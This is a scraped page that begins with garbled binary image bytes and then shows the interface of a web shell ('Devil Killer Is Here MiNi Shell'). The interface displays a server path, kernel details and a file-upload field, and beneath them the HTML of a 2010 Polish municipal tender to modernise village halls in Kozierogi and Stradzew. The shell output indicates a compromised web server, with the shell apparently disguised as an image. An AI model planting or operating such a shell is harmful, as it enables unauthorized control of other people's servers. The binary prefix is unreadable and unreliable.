JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100402/76015-N-2010.html

<p class="kh_header"><b>Wola Krzysztoporska: Modernizacja i wyposażenie Domu Ludowego w Kozierogach  oraz Domu Ludowego w Stradzewie</b><br>
<b>Numer ogłoszenia: 76015 - 2010; data zamieszczenia: 02.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wola Krzysztoporska , ul. Kościuszki 5/11, 97-371 Wola Krzysztoporska, woj. łódzkie, tel. (044) 61-63-961, faks (044) 61-63-960.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wola-krzysztoporska.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Modernizacja i wyposażenie Domu Ludowego w Kozierogach  oraz Domu Ludowego w Stradzewie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Zamawiający wymaga złożenia ofert częściowych na wykonanie następujących części zamówienia:
  1. Zamawiający wymaga złożenia ofert częściowych na wykonanie następujących części zamówienia:
 Część I  Modernizacja i wyposażenie Domu Ludowego w Kozierogach:  

Przedmiotem zamówienia jest wykonanie części z zakresu robót :

przebudowa budynku Domu Ludowego w Kozierogach wraz z wymianą więźby dachowej i zbiornikiem na ścieki,

zgodnie z   pozwoleniem na budowę nr 548/2008 z dnia 08.07.2008 r., projektem budowlanym, oraz specyfikacją techniczną wykonania i odbioru robót budowlanych. 
                                                                                                                 
Szczegółowy opis zakresu prac do wykonania. 

Przedmiot zamówienia obejmuje wykonanie części zakresu robót tj.  wykonanie zgodnie z projektem robót budowlanych  w pomieszczeniach  1.02, 1.03, 1.05, 1.06, 1.07, 1.08  tj.:

- ROBÓT OGÓLNOBUDOWLANYCH w tym.:
1.	Wymiany stolarki okiennej i drzwiowej - w pomieszczeniach - do wymiany stolarka okienna i drzwiowa zgodnie z projektem za wyjątkiem 2 szt. drzwi D-1 w pom. 1.02, które są już wymienione. Należy zamontować parapety wewnętrzne PCV szer. 30cm, wykonać spadki i zamontować parapety zewnętrzne z blachy stalowej powlekanej.
2.	Ścianek wewnętrznych - w pom.1.08 ściankę odgradzająca projektowany kocioł c.o.  i zbiornik oleju, w pom.1.07 - zamurowanie otworu drzwiowego w ściance.
3.	Montażu kratek wentylacyjnych -  zamontować zgodnie z projektem budowlanym.
4.	Podłogi - wymiana istniejącej podłogi na płytki gresowe, m.in. zerwać istniejącą podłogę drewnianą, wykonać podłoże z chudego betonu, wykonać izolację przeciwwilgociową, ułożyć styropian, wykonać posadzkę betonową, ułożyć gres. 
5.	Docieplenia stropu - na istniejącym stropie żelbetowym wykonać paroizolację, a na niej docieplenie z wełny mineralnej - grubość 20cm.
6.	Wykończenia ścian i sufitów - skuć stare tynki, wykonać tynki cementowo- wapienne kat.III, pomalować dwukrotnie farbą ekologiczną akrylową w kolorze jasnym. W pom. gospod.(1.07) i w kotłowni (1.08) do wys.2,05m należy wykonać płytki glazurowane.
7.	Wyłazu dachowego - wyjście na strych w pomieszczeniu 1.07,
8.	Robót rozbiórkowych - rozebrać piec kaflowy w pom.1.02, 
9.	Schodów - wykonać nowe schody wejście główne (przed pom.1.09) zgodnie z projektem (wraz z podjazdem dla niepełnosprawnych), przy wejściu do pom.1.05 rozebrać stare schody, wykonać nowe schody. Zamówienie nie obejmuje wykonania na schodach okładzin z płytek. 
- ROBÓT INSTALACYJNYCH C.O.   w tym:
Należy wykonać instalację c.o. podpodłogową bez montażu grzejników  oraz wyposażenia kotłowni. Wykonać próbę szczelności powietrzną.

Zakres zamówienia  obejmuje również niezbędne do wykonania roboty towarzyszące ww. robotom m.in. wywóz gruzu z rozbiórek.

Osprzęt elektryczny oraz wod - kan (armatura) zostanie zamontowany przez Zamawiającego we własnym zakresie - roboty te nie są objęte przedmiotem zamówienia.
Uwaga
W latach 2008 i 2009 wykonano wymianę dachu (więźba dachowa, pokrycie dachu blachą z folią paroprzepuszczalną), wewnętrzną instalację wod.kan.100%, instalację elektryczną 100%, instalację c.o. podpodłogową w pom.1.01,1.04, 1.10 i 1-12 (bez montażu grzejników), remont pomieszczeń 1.01, 1.09, 1.04, 1.10, 1.11, 1.12 oraz demontaż okienka podawczego i montaż drzwi D-1 w pom.1.02.


Kod CPV: 45450000-6 Roboty budowlane, wykończeniowe, pozostałe. 
Szczegółowy opis przedmiotu zamówienia stanowią załączniki: 
Załącznik nr 6 a                            Specyfikacja techniczna wykonania i odbioru robót budowlany	
Załącznik nr 7 a                             Dokumentacja projektowa 
Załącznik nr 8 a                             Przedmiar robót 
z zastrzeżeniem, że dokumenty te opisują szerszy zakres zamówienia niż objęty niniejszym postępowaniem. Wykonawcy korzystają z ww. dokumentacji w zakresie opisanym w szczegółowym opisie zakresu prac do wykonania. Przedmiar robót załączony jest pomocniczo i obejmuje wszystkie prace ujęte  w projekcie technicznym, natomiast wykonawcy sporządzają wycenę prac na podstawie własnej kalkulacji przedmiarowej jedynie w zakresie objętym niniejszym postępowaniem przetargowym.


Część II   Modernizacja i wyposażenie Domu Ludowego w Stradzewie.  

Przedmiotem zamówienia jest wykonanie części z zakresu robót :

Rozbudowa, nadbudowa i przebudowa budynku Domu Ludowego w Stradzewie wraz          z niezbędną infrastrukturą techniczną i utwardzeniem terenu,

zgodnie z   pozwoleniem na budowę nr 116/2008 z dnia 27.02.2008 r., projektem budowlanym, oraz specyfikacją techniczną wykonania i odbioru robót budowlanych. 
     
 Szczegółowy opis zakresu robót do wykonania: 
                                                                                                           
Przedmiot zamówienia obejmuje wykonanie zgodnie z projektem:


- ROBÓT OGÓLNOBUDOWLANYCH tj.:
A. w pomieszczeniu 1.01, 1.02 i 2.01
1.	Wymiana stolarki okiennej i drzwiowej - w elewacji północno-zachodniej (tył budynku) zdemontować 3szt. okien 120 x 100cm, powiększyć otwór, zamontować 3 szt. okien PCV O-1 (wym.1165x1435mm, RU, szpros wewnątrzszybowy), w ścianie szczytowej (elewacja północno-wschodnia) wykuć otwory okienne 120 * 150cm, obrobić ościeża, zamontować okna O-1, w elewacji południowo-wschodniej (frontowa) zdemontować drzwi 100 x 250 szt.1 i 3 szt. okien 180 x 150cm szt.3, zgodnie z projektem przygotować otwory okienne i drzwiowe (częściowe zamurowanie otworów, częściowe wykucie otworów) oraz wnękę 70x65x25cm pod hydrant, obrobić ościeża, zamontować okna i drzwi. W części otworów należy zamontować nadproża prefabrykowane L-19. Zamontować parapety wewnętrzne PCV szer.30cm, wykonać spadki i zamontować parapety zewnętrzne z blachy stalowej powlekanej. Wskazane jest, aby okna PCV dostosować do już wymienionych w budynku (kształt ramy i szprosa), również parapety zewnętrzne. W 4 skrzydłach zamontować nawiewniki VENTAIR II lub równoważne.
2.	Podłoga  - wymiana istniejącej podłogi na płytki gresowe w technologi opisanej szczegółowo w projekcie.
3.	Sufit podwieszany - wykonać sufit podwieszany z płyt GKF na stelażu stalowym, który ma być zamontowany bezpośrednio do konstrukcji więźby dachowej. Wcześniej należy wykonać paroizolację na istniejącej wełnie mineralnej.
4.	Wykończenie ścian i podsufitki - skuć stare tynki, wykonać tynki cementowo- wapienne kat.III, pomalować dwukrotnie farbą ekologiczną akrylową w kolorze jasnym. Powierzchnie z płyt gipsowych pospoinować i zaszpachlować, a następnie pomalować dwukrotnie farbą ekologiczną akrylową.
5.	Zamontować wentylator dachowy Das160 wraz z przewodami wentylacyjnymi.
B. w pomieszczeniu 1.07
Wymurować studzienkę wodomierzową, zamontować właz, odbić stary tynk na ścianach i suficie, wykonać tynki cementowo- wapienne kat.III, do wysokości 2,05m ułożyć glazurę, ściany powyżej i sufit dwukrotnie pomalować farbą ekologiczną akrylową w kolorze jasnym, zamontować kratkę wentylacyjną, wykonać posadzkę z płytek gresowych, zamontować kratkę ściekową zgodnie z projektem.
II. ROBÓT  INSTAL. WOD.KAN. WEWNĘTRZNYCH
 - zakres zamówienia obejmuje montaż  hydrantu HP 25. Hydrant dostarczy inwestor.
III. ROBÓT INSTAL. C.O. 
Instalacja c.o.podpodłogowa w pom.1.01, 1.02  bez osprzętu. Wykonać próbę szczelności powietrzna.
IV. ROBÓT INSTAL. ELEKTRYCZNYCH tj. 
Wykonać instalację el. wewnętrzną w pom. 1.01, 1.02, 2.01 a w szczególności montaż opraw oświetleniowych szt.16, montaż 3 szt. wkładów oświetlenia awaryjnego, dokonać stosownych pomiarów instalacji. W wycenie nie uwzględniać wartości przewodów, opraw i wkładów oświetlenia awaryjnego -materiał dostarczy inwestor.

Zakres zamówienia  obejmuje również niezbędne do wykonania roboty towarzyszące ww. robotom m.in. wywóz gruzu z rozbiórek.

Uwaga:
W latach 2008 i 2009 wykonano wymianę dachu (więźba dachowa, pokrycie dachu blachą z folią paroprzepuszczalną i izolacją z wełny mineralnej), wewnętrzną instalację wod.kan. (bez montażu hydrantu HP 25), częściowo instalację elektryczną (bez pom.1.01, 1,02), instalację c.o. podpodłogową doprowadzono do pom.1.01 (bez montażu grzejników) oraz remont pozostałych pomieszczeń (bez pomieszczenia 1.01).

Kod CPV: 45450000-6 Roboty budowlane, wykończeniowe, pozostałe. 

Szczegółowy opis przedmiotu zamówienia stanowią załączniki: 
Załącznik nr 6 b                          Specyfikacja techniczna wykonania i odbioru robót budowlany	
Załącznik nr 7 b                          Dokumentacja projektowa 
Załącznik nr 8 b                          Przedmiar robót 
z zastrzeżeniem, że dokumenty te opisują szerszy zakres zamówienia niż objęty niniejszym postępowaniem. Wykonawcy korzystają z ww. dokumentacji w zakresie opisanym w szczegółowym opisie zakresu prac do wykonania. Przedmiar robót załączony jest pomocniczo i obejmuje wszystkie prace wymienione  w projekcie technicznym, natomiast wykonawcy sporządzają wycenę prac na podstawie własnej kalkulacji przedmiarowej jedynie w zakresie objętym niniejszym postępowaniem przetargowym..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Roboty ogónobudowlane do wysokości 50% wartości zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.45.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- nie dotyczy</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zobowiązany jest wykazać, że dysponuje przynajmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami budowlanymi o specjalności konstrukcyjno-budowlanej, lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów a z ich treści wynika, że dotyczą zakresu objętego przedmiotem zamówienia ( dotyczy części I i II) 

W tym celu zobowiazany jest do oferty Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami  załącznik  nr 5.  
oświadczenie potwierdzające posiadanie uprawnień budowlanych do kierowania robotami budowlanymi  przez wskazane osoby  w zakresie niezbędnym do wykonania zamówienia w specjalności konstrukcyjno- budowlanej   - załącznik  nr 4.

Ocena spenienia tego warunku dokonywana bedzie o tresc ww. dokumentu</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający przewiduje możliwość wydłużenia  terminów przewidzianych w umowie                w przypadku wystąpienia zdarzeń do zaistnienia, których Zamawiający się nie przyczynił,  których skutki uniemożliwiły wykonanie przedmiotowej umowy zgodnie z pierwotnym terminem. W przypadku gdy wydłużeniu ulegnie termin wykonania umowy Zamawiający przewiduje możliwość wprowadzenia płatności częściowych tj. po upływie pierwotnego  terminu wykonania umowy zapłatę za zrealizowany zakres robót.                              
2. Zamawiający przewiduje możliwość zmiany treści umowy w przypadku zaistnienia konieczności usunięcia wad ukrytych dokumentacji projektowej  zapobiegających powstaniu wad przedmiotu umowy, wprowadzenia nowych korzystnych rozwiązań projektowych, które nie wykraczają poza zakres przedmiotu zamówienia, Zamawiający z własnej inicjatywy lub                       z inicjatywy Wykonawcy dokona wprowadzenia  tych zmian do projektu, a Wykonawca zobowiązuje się do ich wykonania.
3. Zamawiający przewiduje możliwość zastosowania materiałów  zamiennych jeżeli jest to uzasadnione ze względów technologicznych.
4. Zamawiający przewiduje możliwości zmiany treści umowy w przypadku zmiany przepisów podatkowych, które będą powodowały zmianę stawki VAT.
5. Zamawiający przewiduje możliwości zmiany kierownika budowy w przypadku gdy wskazana przez Wykonawcę osoba z ważnych powodów nie będzie mogła pełnić tej funkcji. Zamawiający wyrazi zgodę na zmianę kierownika budowy tylko wtedy gdy wskazana przez Wykonawcę osoba będzie posiadała odpowiednie kwalifikacje, zgodnie z wymogami  SIWZ. 
6. Zamawiający przewiduje możliwość wykonania zamówień dodatkowych w przypadku spełnienia przesłanek określonych w art. 67  Ustawy Prawo zamówień publicznych. Wynagrodzenie  za roboty dodatkowe będzie miało charakter wynagrodzenia kosztorysowego.  
7. Zamawiający zastrzega sobie możliwość rezygnacji z wykonania części zakresu robót. Podstawą do ustalenia ewentualnej korekty będzie kosztorys ofertowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wola-krzysztoporska.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Wola Krzysztoporska
Ul. Kościuszki 5
97-371 Wola Krzysztoporska.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.04.2010 godzina 12:00, miejsce: Gmina Wola Krzysztoporska
Ul. Kościuszki 5
97-371 Wola Krzysztoporska.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I  Modernizacja i wyposażenie Domu Ludowego w Kozierogach.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie części z zakresu robót :

przebudowa budynku Domu Ludowego w Kozierogach wraz z wymianą więźby dachowej i zbiornikiem na ścieki,

zgodnie z   pozwoleniem na budowę nr 548/2008 z dnia 08.07.2008 r., projektem budowlanym, oraz specyfikacją techniczną wykonania i odbioru robót budowlanych. 
                                                                                                                 
Szczegółowy opis zakresu prac do wykonania. 

Przedmiot zamówienia obejmuje wykonanie części zakresu robót tj.  wykonanie zgodnie z projektem robót budowlanych  w pomieszczeniach  1.02, 1.03, 1.05, 1.06, 1.07, 1.08  tj.:

- ROBÓT OGÓLNOBUDOWLANYCH w tym.:
1.	Wymiany stolarki okiennej i drzwiowej - w pomieszczeniach - do wymiany stolarka okienna i drzwiowa zgodnie z projektem za wyjątkiem 2 szt. drzwi D-1 w pom. 1.02, które są już wymienione. Należy zamontować parapety wewnętrzne PCV szer. 30cm, wykonać spadki i zamontować parapety zewnętrzne z blachy stalowej powlekanej.
2.	Ścianek wewnętrznych - w pom.1.08 ściankę odgradzająca projektowany kocioł c.o.  i zbiornik oleju, w pom.1.07 - zamurowanie otworu drzwiowego w ściance.
3.	Montażu kratek wentylacyjnych -  zamontować zgodnie z projektem budowlanym.
4.	Podłogi - wymiana istniejącej podłogi na płytki gresowe, m.in. zerwać istniejącą podłogę drewnianą, wykonać podłoże z chudego betonu, wykonać izolację przeciwwilgociową, ułożyć styropian, wykonać posadzkę betonową, ułożyć gres. 
5.	Docieplenia stropu - na istniejącym stropie żelbetowym wykonać paroizolację, a na niej docieplenie z wełny mineralnej - grubość 20cm.
6.	Wykończenia ścian i sufitów - skuć stare tynki, wykonać tynki cementowo- wapienne kat.III, pomalować dwukrotnie farbą ekologiczną akrylową w kolorze jasnym. W pom. gospod.(1.07) i w kotłowni (1.08) do wys.2,05m należy wykonać płytki glazurowane.
7.	Wyłazu dachowego - wyjście na strych w pomieszczeniu 1.07,
8.	Robót rozbiórkowych - rozebrać piec kaflowy w pom.1.02, 
9.	Schodów - wykonać nowe schody wejście główne (przed pom.1.09) zgodnie z projektem (wraz z podjazdem dla niepełnosprawnych), przy wejściu do pom.1.05 rozebrać stare schody, wykonać nowe schody. Zamówienie nie obejmuje wykonania na schodach okładzin z płytek. 
- ROBÓT INSTALACYJNYCH C.O.   w tym:
Należy wykonać instalację c.o. podpodłogową bez montażu grzejników  oraz wyposażenia kotłowni. Wykonać próbę szczelności powietrzną.

Zakres zamówienia  obejmuje również niezbędne do wykonania roboty towarzyszące ww. robotom m.in. wywóz gruzu z rozbiórek.

Osprzęt elektryczny oraz wod - kan (armatura) zostanie zamontowany przez Zamawiającego we własnym zakresie - roboty te nie są objęte przedmiotem zamówienia.
Uwaga
